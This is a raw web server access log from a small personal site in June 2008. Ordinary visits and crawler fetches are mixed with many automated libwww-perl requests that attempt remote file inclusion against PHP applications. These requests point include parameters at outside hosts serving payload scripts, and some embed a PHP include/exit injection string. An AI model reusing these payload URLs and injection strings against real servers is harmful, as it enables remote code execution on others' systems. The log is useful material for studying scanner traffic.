70.231.152.201 - - [25/Jun/2008:20:52:25 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.50 (Windows NT 5.1; U; en)"
70.231.152.201 - - [25/Jun/2008:20:52:25 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.50 (Windows NT 5.1; U; en)"
77.249.43.223 - - [25/Jun/2008:20:52:30 -0500] "GET / HTTP/1.1" 200 1243 "-""Java/1.6.0_04"
200.11.67.242 - - [25/Jun/2008:20:53:54 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:53:54 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:54:57 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:54:58 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
70.231.152.201 - - [25/Jun/2008:20:55:10 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Opera/9.50 (Windows NT 5.1; U; en)"
200.11.67.242 - - [25/Jun/2008:20:59:08 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:59:09 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:59:10 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:59:11 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
81.192.48.40 - - [25/Jun/2008:21:01:23 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.76.128.155 - - [25/Jun/2008:21:05:15 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
211.76.128.155 - - [25/Jun/2008:21:05:16 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
211.76.128.155 - - [25/Jun/2008:21:05:18 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
217.167.194.105 - - [25/Jun/2008:21:08:49 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.213.183 - - [25/Jun/2008:21:10:59 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
212.241.213.183 - - [25/Jun/2008:21:10:59 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
82.194.73.130 - - [25/Jun/2008:21:13:52 -0500] "GET /logs//bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:21:13:53 -0500] "GET //bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
67.18.241.90 - - [25/Jun/2008:21:16:41 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Zola-Hacker??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
67.18.241.90 - - [25/Jun/2008:21:16:41 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Zola-Hacker??? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
83.222.27.201 - - [25/Jun/2008:21:22:55 -0500] "GET /logs/errors.php?error=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:22:55 -0500] "GET /errors.php?error=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:21:23:24 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:23:24 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:24:14 -0500] "GET /logs/errors.php?error=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:24:15 -0500] "GET /errors.php?error=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
89.111.179.12 - - [25/Jun/2008:21:25:32 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
89.111.179.12 - - [25/Jun/2008:21:25:32 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:21:26:00 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:26:00 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
83.222.27.201 - - [25/Jun/2008:21:27:21 -0500] "GET /logs//poll/errors.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:27:21 -0500] "GET //poll/errors.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:28:11 -0500] "GET /logs//poll/errors.php?error=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:28:14 -0500] "GET //poll/errors.php?error=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
74.6.8.113 - - [25/Jun/2008:21:28:25 -0500] "GET /logs/access_log.1192838400 HTTP/1.0" 200 131938 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.11.67.242 - - [25/Jun/2008:21:28:44 -0500] "GET /logs//poll/errors.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:28:44 -0500] "GET //poll/errors.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:29:12 -0500] "GET /logs//poll/errors.php?error=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:29:12 -0500] "GET //poll/errors.php?error=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
217.167.194.105 - - [25/Jun/2008:21:29:38 -0500] "GET /logs//atom.php5?page=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.180.84.186 - - [25/Jun/2008:21:29:38 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
213.180.84.186 - - [25/Jun/2008:21:29:38 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:21:29:39 -0500] "GET //atom.php5?page=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.25.94.30 - - [25/Jun/2008:21:29:49 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/help01.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
85.25.94.30 - - [25/Jun/2008:21:29:49 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/help01.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
209.200.246.99 - - [25/Jun/2008:21:34:29 -0500] "GET /logs/errors.php?error=http://www.501gt.com/includes/help/msg/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
209.200.246.99 - - [25/Jun/2008:21:34:29 -0500] "GET /errors.php?error=http://www.501gt.com/includes/help/msg/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
66.48.80.144 - - [25/Jun/2008:21:35:12 -0500] "GET /logs/errors.php?error=http://www.501gt.com/includes/help/msg/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
66.48.80.144 - - [25/Jun/2008:21:35:12 -0500] "GET /errors.php?error=http://www.501gt.com/includes/help/msg/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
83.222.27.201 - - [25/Jun/2008:21:36:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:36:25 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
62.140.73.234 - - [25/Jun/2008:21:37:16 -0500] "GET /logs/errors.php?error=http://www.501gt.com/includes/help/msg/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.140.73.234 - - [25/Jun/2008:21:37:16 -0500] "GET /errors.php?error=http://www.501gt.com/includes/help/msg/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.180.84.186 - - [25/Jun/2008:21:39:43 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
213.180.84.186 - - [25/Jun/2008:21:39:43 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
83.222.27.201 - - [25/Jun/2008:21:40:43 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:40:43 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:21:40:57 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:40:58 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
77.221.157.210 - - [25/Jun/2008:21:41:34 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.157.210 - - [25/Jun/2008:21:41:34 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.157.210 - - [25/Jun/2008:21:41:35 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.29.75.39 - - [25/Jun/2008:21:41:50 -0500] "GET /logs/send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:21:41:51 -0500] "GET /send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
200.11.67.242 - - [25/Jun/2008:21:41:52 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:41:52 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
83.222.27.201 - - [25/Jun/2008:21:43:31 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:21:43:32 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:21:47:02 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:21:47:02 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
72.29.73.67 - - [25/Jun/2008:21:47:54 -0500] "GET /logs/send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.29.73.67 - - [25/Jun/2008:21:47:54 -0500] "GET /send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
217.148.95.147 - - [25/Jun/2008:21:48:32 -0500] "GET /logs/send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:21:48:32 -0500] "GET /send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
74.6.8.113 - - [25/Jun/2008:21:49:21 -0500] "GET /logs/access_log.1197417600 HTTP/1.0" 200 218390 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.95.15 - - [25/Jun/2008:21:49:43 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
83.149.95.15 - - [25/Jun/2008:21:49:43 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
81.192.48.40 - - [25/Jun/2008:21:51:06 -0500] "GET //config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
83.149.95.15 - - [25/Jun/2008:21:51:45 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
83.149.95.15 - - [25/Jun/2008:21:51:46 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
74.6.8.113 - - [25/Jun/2008:21:52:44 -0500] "GET /costume/ HTTP/1.0" 200 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.95.15 - - [25/Jun/2008:21:53:01 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
72.29.75.39 - - [25/Jun/2008:21:53:45 -0500] "GET /logs/send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.29.75.39 - - [25/Jun/2008:21:53:54 -0500] "GET /send_reminders.php?includedir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
81.192.48.40 - - [25/Jun/2008:21:54:03 -0500] "GET /logs//errors.php?error=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:21:54:19 -0500] "GET //errors.php?error=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.156.62.144 - - [25/Jun/2008:21:56:51 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
213.156.62.144 - - [25/Jun/2008:21:56:52 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
213.180.84.186 - - [25/Jun/2008:21:56:56 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
213.180.84.186 - - [25/Jun/2008:21:56:57 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
83.149.95.15 - - [25/Jun/2008:21:57:30 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
83.149.95.15 - - [25/Jun/2008:21:57:31 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
87.230.1.10 - - [25/Jun/2008:21:57:39 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://nightbaron.com/poll/templates/admin/a.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.76"
87.230.1.10 - - [25/Jun/2008:21:57:39 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://nightbaron.com/poll/templates/admin/a.txt?%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
210.64.124.93 - - [25/Jun/2008:21:59:04 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
210.64.124.93 - - [25/Jun/2008:21:59:05 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
210.64.124.93 - - [25/Jun/2008:21:59:05 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.11.67.242 - - [25/Jun/2008:22:00:56 -0500] "GET /logs/errors.php?error=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:22:00:57 -0500] "GET /errors.php?error=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
217.167.194.105 - - [25/Jun/2008:22:07:29 -0500] "GET /logs//poll/errors.php?error=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:07:30 -0500] "GET //poll/errors.php?error=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
65.214.45.167 - - [25/Jun/2008:22:09:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.0" 200 11901 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
81.192.48.40 - - [25/Jun/2008:22:11:16 -0500] "GET //atom.php5?page=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:22:14:13 -0500] "GET /logs//atom.php5?page=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:22:14:57 -0500] "GET //atom.php5?page=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.167.194.105 - - [25/Jun/2008:22:15:29 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:15:30 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
83.149.95.15 - - [25/Jun/2008:22:16:57 -0500] "GET /logs/htmltonuke.php?filnavn=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
83.149.95.15 - - [25/Jun/2008:22:16:58 -0500] "GET /htmltonuke.php?filnavn=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.167.194.105 - - [25/Jun/2008:22:17:02 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:17:06 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
213.156.62.144 - - [25/Jun/2008:22:18:30 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
213.156.62.144 - - [25/Jun/2008:22:18:31 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
69.93.48.162 - - [25/Jun/2008:22:21:43 -0500] "GET /logs/db.php?path_local=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 295 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:22:21:44 -0500] "GET /logs/db.php?path_local=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 295 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:22:21:44 -0500] "GET /db.php?path_local=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 290 "-""libwww-perl/5.69"
69.93.48.162 - - [25/Jun/2008:22:21:44 -0500] "GET /db.php?path_local=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 290 "-""libwww-perl/5.69"
217.167.194.105 - - [25/Jun/2008:22:22:03 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:22:22:04 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
70.85.192.194 - - [25/Jun/2008:22:25:14 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
70.85.192.194 - - [25/Jun/2008:22:25:14 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
74.6.8.113 - - [25/Jun/2008:22:25:56 -0500] "GET /logs/access_log.1160092800 HTTP/1.0" 200 168574 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.179.16 - - [25/Jun/2008:22:29:41 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.111.179.16 - - [25/Jun/2008:22:29:41 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.76.111.11 - - [25/Jun/2008:22:30:52 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.76.111.11 - - [25/Jun/2008:22:30:52 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
213.22.158.90 - - [25/Jun/2008:22:31:40 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
213.22.158.90 - - [25/Jun/2008:22:31:40 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
65.214.45.167 - - [25/Jun/2008:22:33:05 -0500] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
74.6.8.113 - - [25/Jun/2008:22:33:32 -0500] "GET /logs/access_log.1197331200 HTTP/1.0" 200 166548 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
